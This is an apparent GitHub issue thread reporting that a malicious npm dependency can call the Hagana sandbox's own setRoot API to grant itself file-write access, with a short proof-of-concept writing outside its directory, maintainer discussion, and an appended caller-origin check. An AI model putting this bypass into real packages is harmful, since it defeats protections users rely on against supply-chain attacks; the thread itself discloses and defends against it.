
Hagana self-authorize break out

Open Mickael-van-der-Beek opened this issue 2 years ago • 3 comments

Since Hagana is available to the other node_modules, it's possible to call Hagana inside the malicious module to self-authorise the wanted actions.

E.g., the malicious library code:

import fs from 'fs';
import path from 'path';
import hagana from '@hagana/hagana';

export function run () {
  const fileDirectory = path.resolve(path.dirname('.'), '..');
  const filePath = path.resolve(fileDirectory, './out.txt');
  hagana.setRoot(fileDirectory);
  fs.writeFileSync(filePath, 'yolooo', { encoding: 'utf-8' });
}

Mickael-van-der-Beek • Jul 15 '22 15:07

🤦🏻‍♂️ This is a good find. I guess the only way to solve this is by maintaining internal state to know that hagana has already been required and then prevent additional requires.

Need to think about this.

yaakov123 • Jul 15 '22 15:07

I would probably block any calls to Hagana coming from the library directory outside of Hagana's directory itself.

Mickael-van-der-Beek • Jul 15 '22 15:07

That's a better idea.

yaakov123 • Jul 16 '22 18:07
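
The caller-origin check proposed in the comments above, sketched as an added example that is not part of the thread and not Hagana's own code. The names `callerFile`, `isAllowedCaller`, `guard` and `OWN` are hypothetical, the paths are constructed, and POSIX-style absolute paths on Node.js (V8) are assumed.

```javascript
// Added example; all names are hypothetical and not Hagana's internals.
// Assumes POSIX-style absolute paths and V8 (Node.js) stack-trace APIs.

// File of the code that called `apiFn`, or null when it cannot be determined.
function callerFile(apiFn) {
  const prev = Error.prepareStackTrace;
  const holder = {};
  try {
    Error.prepareStackTrace = (_err, frames) => frames; // structured frames
    Error.captureStackTrace(holder, apiFn); // omit apiFn and frames above it
    const frames = holder.stack;
    if (!Array.isArray(frames) || !frames[0]) return null;
    return frames[0].getFileName() || null;
  } finally {
    Error.prepareStackTrace = prev;
  }
}

// Policy from the thread: the package's own files may call the API, any other
// file under node_modules may not, application code may.
function isAllowedCaller(file, ownDir) {
  if (!file) return false; // unknown origin (eval, native code): fail closed
  const p = file.startsWith('file://')
    ? decodeURIComponent(new URL(file).pathname) // ESM frames report file URLs
    : file;
  const segments = p.split('/');
  if (segments.includes('..') || segments.includes('.')) return false; // not normalised
  const own = ownDir.replace(/\/+$/, '') + '/';
  if (p.startsWith(own)) {
    // Dependencies nested inside the package directory are still third-party code.
    return !p.slice(own.length).split('/').includes('node_modules');
  }
  return !segments.includes('node_modules');
}

// Wrap a sensitive function so that it only runs for allowed callers.
function guard(fn, ownDir, getCaller = callerFile) {
  return function guarded(...args) {
    const file = getCaller(guarded);
    if (!isAllowedCaller(file, ownDir)) {
      throw new Error(`call denied for caller: ${file}`);
    }
    return fn.apply(this, args);
  };
}

// Constructed path of the protecting package's own directory.
const OWN = '/app/node_modules/@hagana/hagana';
```

Because the check runs in the same process as the code it polices, it is a policy gate rather than an isolation boundary.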